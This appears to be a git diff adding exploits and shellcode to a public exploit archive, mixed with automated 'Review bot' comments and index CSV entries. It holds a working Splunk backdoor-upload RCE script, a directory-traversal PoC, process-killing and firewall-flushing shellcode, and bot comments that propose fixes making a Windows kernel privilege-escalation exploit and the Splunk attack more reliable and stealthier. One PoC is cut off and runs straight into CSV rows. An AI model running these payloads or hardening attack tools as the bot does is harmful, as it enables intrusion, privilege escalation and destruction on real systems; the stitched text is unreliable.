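Review bot: `main` uses the return value of `TokenAddressCurrentProcess` without checking it: that function returns 0 when no matching handle is found and `-1` (which wraps to `0xFFFFFFFFFFFFFFFF` in a `QWORD`) on failure, so the two `DeviceIoControl(hDevice, 0x80002063, ...)` calls would then aim the driver's write at kernel addresses `0x40`/`0x48` or `0x3F`/`0x47` and almost certainly bugcheck the host. The `do { ... } while (hTokenElevate == NULL)` loop has no attempt limit and the failure `printf` in `CreateUserToken` is commented out, so when the overwrite does not take (e.g. a different `SepPrivilegesOffset` on the target build) the exploit silently re-issues the IOCTL every 500 ms forever. Separately, `GetWindowsVersion` relies on `GetVersionEx`, which reports 6.2 for Windows 8 and later unless the binary carries a compatibility manifest, so the branch labelled "Windows 10" really means "anything ≥ 8 reported as 6.2" and would fall through to "not tested" on a manifested build; `RtlGetVersion` or `IsWindows10OrGreater()` is the reliable check. The cleanup after `return NULL` in `CreateUserToken` is unreachable, so `groups`, `privileges` and both SIDs leak on every retry. Proposed guard and bounded loop:

```c
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
/* 0 = handle not found, (QWORD)-1 = lookup failed; never hand either to the driver */
if (TokenAddress == 0 || TokenAddress == (QWORD)-1)
{
    printf("\n[-] Could not locate the current process token object, aborting\n\n");
    return -1;
}
/* … unchanged: offset computation, device open, OpenProcessToken … */
int attempts = 0;
do
{
    printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits (attempt %d)", attempts + 1);
    DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
    DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
    hTokenElevate = CreateUserToken(hTokenCurrent);
    Sleep(500);
} while (hTokenElevate == NULL && ++attempts < 10);

if (hTokenElevate == NULL)
{
    printf("\n[-] Token privileges not updated after %d attempts, aborting\n\n", attempts);
    CloseHandle(hDevice);
    return -1;
}
/* … unchanged: version branch and payload launch … */
```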
@@ -0,0 +1,150 @@ +#!/usr/bin/python + +# Exploit Title: Splunk Enterprise 7.2.4 Custom App RCE (persistent backdoor - custom binary payload) +# Date: March 1, 2019 +# Exploit Author: Matteo Malvica +# Original Author: Lee Mazzoleni +# Vendor Homepage: https://www.splunk.com/ +# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html +# Version: 7.2.4 +# Tested on: kali 4.18.0-kali2-amd64 +# CVE : n/a + +# NOTES: Due to python interoperability issue on CentOS, I have upgraded the exploit to +# support any kind of binary or payload so the exploit does not have to rely on any python libraries + +from selenium import webdriver +from selenium.webdriver.common.keys import Keys +from time import sleep +from sys import stdout,argv +from os import getcwd,path,system +from subprocess import Popen +import os +import stat +import binascii + +# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases +gecko_driver_path = '/root/Desktop/geckodriver' + +def checkLogin(url): + if '/login' not in url and '/logout' not in url: + print 'Login successful!' + else: + print 'Login failed! Aborting...' + exit() + + +def checkUrl(url): + if '_upload' not in url: + print '[-] Navigation error, aborting...' + exit() + + +def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass): + print '[+] Starting bot ...' + profile = webdriver.FirefoxProfile() + profile.accept_untrusted_certs = True + driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path) + + print '[*] Loading the target page ...' + driver.get(splunk_target_url) + sleep(1) + + stdout.write('[*] Attempting to log in with the provided credentials ... 
') + username_field = driver.find_element_by_name("username") + username_field.clear() + username_field.send_keys(splunk_admin_user) + sleep(1) + + pw_field = driver.find_element_by_name("password") + pw_field.clear() + pw_field.send_keys(splunk_admin_pass) + pw_field.send_keys(Keys.RETURN) + sleep(3) + + current_url = driver.current_url + checkLogin(current_url) + + url = driver.current_url.split('/') + upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload' + print '[*] Navigating to the uploads page ({}) ...'.format(upload_url) + driver.get(upload_url) + sleep(1) + + current_url = driver.current_url + checkUrl(current_url) + + form = driver.find_element_by_tag_name("form") + input = form.find_element_by_id("appfile") + input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz') + force_update = driver.find_element_by_id("force") + force_update.click() + submit_button = driver.find_element_by_class_name("splButton-primary") + submit_button.click() + + print '[*] Your persistent shell has been successfully uploaded!' + print '[*] Be patient, this might take up to a minute...!' + driver.quit() + + +def generatePayload(shellcode): + # this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload + # after the app is written to disk, together with the provided custom shellcode. + # the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.) + # this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds + + # CHANGED: the compressed app folder structure is loading a custom binary from inputs.conf + print '[*] Creating Splunk App...' 
+ shell = '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' + bytes = shell.decode('hex') + f = open('splunk-shell.tar.gz','wb') + f.write(bytes) + f.close() + + if shellcode == "evil": + print "shellcode filename needs to be different - please change it" + exit() + + print '\t==> Adding custom shellcode' + # custom shellcode loading + with open(shellcode, "rb") as binaryfile : + evil_bytes = bytearray(binaryfile.read()) + f = open('evil','w') + f.write(evil_bytes) + f.close() + st = os.stat('evil') + # making the binary executable + os.chmod('evil', st.st_mode | stat.S_IEXEC) + decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz' + p = Popen(decompress_cmd, shell=True, executable='/bin/bash') + p.wait() + move_cmd = 'cp evil splunk-shell/bin/' + p = Popen(move_cmd, shell=True, executable='/bin/bash') + p.wait() + compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/' + p = Popen(compress_cmd, shell=True, executable='/bin/bash') + p.wait() + if path.isfile('splunk-shell.tar.gz'): + print '\t==> Payload Ready! (splunk-shell.tar.gz)' + +def showUsage(): + print '\n\tScript Usage: {} '.format(argv[0]) + print '\tExample: {} http://192.168.4.16:8000 admin changeme shellcode.bin\n'.format(argv[0]) + +if len(argv) != 5: + showUsage() + exit() + +if not path.isfile(gecko_driver_path): + print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:' + print '\t\t==> https://github.com/mozilla/geckodriver/releases' + print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.' + print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n' + exit() + +splunk_target_url = argv[1] +splunk_admin_user = argv[2] +splunk_admin_pass = argv[3] +splunk_shellcode = argv[4] +generatePayload(splunk_shellcode) +exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass) \ No newline at end of file 
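Review bot: In `generatePayload` the `if shellcode == "evil":` guard runs only after `splunk-shell.tar.gz` has already been written, so that early `exit()` leaves a half-built app archive in the working directory; the check belongs at the top of the function, before the hex blob is decoded. The payload copy is written with `open('evil', 'w')` in text mode, which only works because this is a Python 2 script (`print` statements); `with open('evil', 'wb') as f: f.write(evil_bytes)` is correct on both, and since `cp evil splunk-shell/bin/` is used rather than `mv`, the executable payload is left behind in the current directory after `rm -r splunk-shell/` — add `rm evil` to `compress_cmd`. The admin password is read from `argv[3]`, which exposes it in shell history and `ps` output on the operator's machine; falling back to `getpass.getpass()` when the argument is omitted avoids that. This is post-authentication feature abuse (app install as a Splunk admin), which `CVE : n/a` already implies; stating `# Requires: Splunk admin credentials` in the header would make that explicit for anyone triaging it.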
diff --git a/exploits/windows/webapps/46494.py b/exploits/windows/webapps/46494.py new file mode 100755 index 000000000..c74d1447c --- /dev/null +++ b/exploits/windows/webapps/46494.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/env python + +''' +# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal +# Date: 02/11/2019 +# Exploit Author: 0v3rride +# Vendor Homepage: https://marcom.com/ +# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe +# Version: < 10.0 (version tested was 9.3) +# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler) +# Tested on: Windows +# CVE : 2019-7751 + +Summary +A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution. + +Attack Details +Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. :/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080. + +Vendor Response +The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". 
It is possible that these versions are also susceptible to the issue as well based on the response from the vendor. + +Resolution +Thankfully I found some better solutions other than "just delete it". + + Open services.msc + Look for the service named FusionPro Internet Request Handler + Right-click and open the properties Window + Stop the service if it's running + Select disabled startup type + +Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets. + +The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version . +''' + +####################### +# PoC by: 0v3rride # +# DoC: February 2019 # +####################### + +from requests import * +from sys import *; + + +def travel(fullurl): + r = get(fullurl); + print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl)) + print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code)); + print("-" * 80 + "\n[i]: Response Headers:\n"); + + for hdr in r.headers: + print("{}: {}".format(hdr, r.headers[hdr])); + + print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text)); + + +if len(argv) < 3: + print("[i]: Usage -- ./poc : init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android, 45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64, -45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows, +45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows, 45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 
'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows, 45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86, 45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows, @@ -10236,6 +10239,7 @@ id,file,description,date,author,type,platform,port 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, +45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows, 45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, 
@@ -27399,7 +27403,7 @@ id,file,description,date,author,type,platform,port
 22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,webapps,php,
 22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",webapps,php,
 22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,webapps,php,
-22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
+22039,exploits/php/webapps/22039.txt,"Symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
 22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,webapps,jsp,
 22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",webapps,multiple,
 22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,webapps,php,
@@ -34987,7 +34991,7 @@ id,file,description,date,author,type,platform,port
 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
 34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
 34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443
-34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",webapps,php,80
+34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,Wireghoul,webapps,php,80
 34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,webapps,multiple,8090
 34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",webapps,php,
 34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,webapps,php,
@@ -40241,6 +40245,7 @@ id,file,description,date,author,type,platform,port
 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
+46489,exploits/hardware/webapps/46489.txt,"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution",2019-03-04,JameelNabbo,webapps,hardware,80
 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
@@ -40249,6 +40254,7 @@ id,file,description,date,author,type,platform,port
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
 44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
+46488,exploits/php/webapps/46488.txt,"zzzphp CMS 1.6.1 - Cross-Site Request Forgery",2019-03-04,"Yang Chenglong",webapps,php,80
 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
 44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
 44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
@@ -40436,6 +40442,7 @@ id,file,description,date,author,type,platform,port
 45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
+46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000
 45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
 45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
 45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
@@ -40545,6 +40552,7 @@ id,file,description,date,author,type,platform,port
 45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
 45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
 45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80
 45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
 45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
 45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
@@ -40848,6 +40856,7 @@ id,file,description,date,author,type,platform,port
 46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
 46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
+46482,exploits/php/webapps/46482.txt,"OOP CMS BLOG 1.0 - Multiple SQL Injection",2019-03-04,"Mr Winst0n",webapps,php,80
 46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
 46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
 40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
@@ -40879,6 +40888,7 @@ id,file,description,date,author,type,platform,port
 46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
 46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
 46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
+46483,exploits/php/webapps/46483.txt,"OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
 46440,exploits/php/webapps/46440.txt,"EI-Tube 3 - SQL Injection",2019-02-21,"Meisam Monsef",webapps,php,80
 46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
 46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
@@ -40930,3 +40940,10 @@ id,file,description,date,author,type,platform,port
 46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php,
 46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
 46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,
+46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
+46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80
+46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows,
+46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
+46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
+46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80
+46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8c93ee155..3039e3a16 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -843,6 +843,7 @@ id,file,description,date,author,type,platform
 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
 43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
 43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
+46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
 44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
@@ -888,9 +889,11 @@ id,file,description,date,author,type,platform
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
 44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
+46492,shellcodes/linux_x86-64/46492.c,"Linux/x64 - Kill All Processes Shellcode (11 bytes)",2019-03-04,"Aron Mihaljevic",shellcode,linux_x86-64
 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
+46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
diff --git a/shellcodes/linux_x86-64/46492.c b/shellcodes/linux_x86-64/46492.c
new file mode 100644
index 000000000..82a73dcc9
--- /dev/null
+++ b/shellcodes/linux_x86-64/46492.c
@@ -0,0 +1,64 @@ +/* +;Title: Linux/x86_64 - KILL_ALL +;Author: Aron Mihaljevic +;Architecture: Linux x86_64 +;Shellcode Length: 11 bytes + +========DESCTIPTION=========================== + #include + #include + int kill(pid_t pid, int sig); + + +===COMPILATION AND EXECUTION================== + +#nasm -f elf64 kill.nasm -o kill.o + +#ld kill.o -o kill + +=================SHELLCODE================ + +global _start + +section .text + +_start: + + + + + + push 0x3e ; sys kill + pop rax + push -1 ; pid + pop rdi + push 0x9 ; sig kill + pop rsi + syscall + + + +====================FOR C Compile=========================== + + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + +unsigned char code[] = \ +"\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"; + + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/46491.c b/shellcodes/linux_x86/46491.c new file mode 100644 index 000000000..0c9271987 --- /dev/null +++ b/shellcodes/linux_x86/46491.c 
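Review bot: `main()` at the end of the hunk is declared without a return type, and the two `#include` directives above `code[]` name no header as rendered here, so the harness leans on implicit int and on implicit declarations of `printf` and `strlen`, both of which GCC 14 rejects by default; declare it `int main(void)` and confirm the includes read `#include <stdio.h>` and `#include <string.h>` (the header names may have been lost in rendering rather than in the committed file). The `(int)` cast on `strlen(code)` does keep the `%d` conversion well-defined here, which the sibling files 46491.c and 46493.c in this commit do not do. The header comment misspells "DESCTIPTION" and its "FOR C Compile" section should also state what running the harness does to the tester's own session, since the documented `kill(-1, 9)` is delivered to every process the caller is allowed to signal; a single sentence such as `/* Running this harness SIGKILLs every process the invoking user may signal - run only in a disposable VM */` belongs next to the gcc line.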
@@ -0,0 +1,55 @@ +/**********************************************/ +/* linux/x86 iptables -F Length: 43 bytes */ +/* */ +/* 03/01/2019 */ +/* */ +/* Author: Cameron Brown */ +/* */ +/* Email: pwoerTF@gmail.com */ +/**********************************************/ + +global _start + +section .text + +_start: + jmp short get +code: + pop ebx + cdq + mov [ebx+0xe], dl + + lea eax, [ebx+0xf] + push edx + push eax + push ebx + mov ecx, esp + + mov eax, edx + mov al, 0xb + int 0x80 +get: + call code + file: db "/sbin/iptables#-F" + + +-------------------------------------------------- + + +#include +#include + + +unsigned char code[] = \ +"\xeb\x13\x5b\x99\x88\x53\x0e\x8d\x43\x0f\x52\x50\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x23\x2d\x46"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/46493.c 